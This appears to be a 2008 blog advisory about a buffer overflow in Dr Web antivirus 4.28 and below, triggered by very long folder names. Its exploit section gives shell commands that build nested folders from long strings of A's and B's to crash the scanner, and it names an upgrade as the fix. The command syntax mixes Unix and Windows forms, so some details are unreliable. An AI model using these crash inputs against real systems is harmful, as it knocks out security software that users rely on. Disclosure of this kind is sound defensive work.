Security
Software
Necessary

Friday, July 11, 2008

Buffer overflow in cmd

Vulnerable versions:
* Dr Web Version 4.28 and below

Immune versions:
*Dr Web Version 4.29b and above

When a user with access to the system creates files with a very long name
it causes the buffer overflow and writes over the EIP, thus granting the
user the ability to execute arbitrary code with root privileges.

The program consists of a monitor and scanner. Only the scanner option was
tested on the 4.28a version and it was found vulnerable.

Exploit:
Build a folder with a very long name:

set a= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA
set b= BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBB

mkdir /$a
mkdir /$a/$b

Or:

SET A = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA
SET B = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBB

mkdir \\?\c:\%A%
mkdir \\?\c:\%B%

Depending on system.

When the Anti-virus tries to scan the folder it crashes.

Solution:
Download latest version from Dr Web:
Newest Versions

Stumble Upon Toolbar

No comments:

Free Web Hosting

Free Web Hosting with Website Builder

Snap Shots

Get Free Shots from Snap.com